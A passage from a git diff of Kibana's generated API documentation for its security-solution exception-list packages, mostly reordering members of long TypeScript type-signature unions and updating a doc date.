\"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) | null>]" + "[PersistReturnExceptionItem, React.Dispatch<({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) | null>]" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_persist_exception_item/index.ts", "deprecated": false, diff --git a/api_docs/kbn_securitysolution_list_hooks.mdx b/api_docs/kbn_securitysolution_list_hooks.mdx index ec0088a62ca80..2c751817d9bf2 100644 --- a/api_docs/kbn_securitysolution_list_hooks.mdx +++ b/api_docs/kbn_securitysolution_list_hooks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-list-hooks title: "@kbn/securitysolution-list-hooks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-list-hooks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-list-hooks'] --- import kbnSecuritysolutionListHooksObj from './kbn_securitysolution_list_hooks.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_list_utils.devdocs.json b/api_docs/kbn_securitysolution_list_utils.devdocs.json index 557c90c7812a6..056f6248c08a1 100644 --- a/api_docs/kbn_securitysolution_list_utils.devdocs.json +++ b/api_docs/kbn_securitysolution_list_utils.devdocs.json @@ -27,7 +27,7 @@ "label": "addIdToEntries", "description": [], "signature": [ - "(entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]) => ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "(entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]) => ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, @@ -40,7 +40,7 @@ "label": "entries", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, @@ -58,7 +58,7 @@ "label": "buildExceptionFilter", "description": [], "signature": [ - "({ lists, excludeExceptions, chunkSize, alias, }: { lists: ({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]; excludeExceptions: boolean; chunkSize: number; alias: string | null; }) => ", + "({ lists, excludeExceptions, chunkSize, alias, }: { lists: ({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]; excludeExceptions: boolean; chunkSize: number; alias: string | null; }) => ", "Filter", " | undefined" ], @@ -83,7 +83,7 @@ "label": "lists", "description": [], "signature": [ - "({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" + "({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" ], "path": "packages/kbn-securitysolution-list-utils/src/build_exception_filter/index.ts", "deprecated": false @@ -741,7 +741,7 @@ "section": "def-common.ExceptionsBuilderExceptionItem", "text": "ExceptionsBuilderExceptionItem" }, - "[]) => ({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" + "[]) => ({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, @@ -995,7 +995,7 @@ "section": "def-common.FormattedBuilderEntry", "text": "FormattedBuilderEntry" }, - ") => ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | 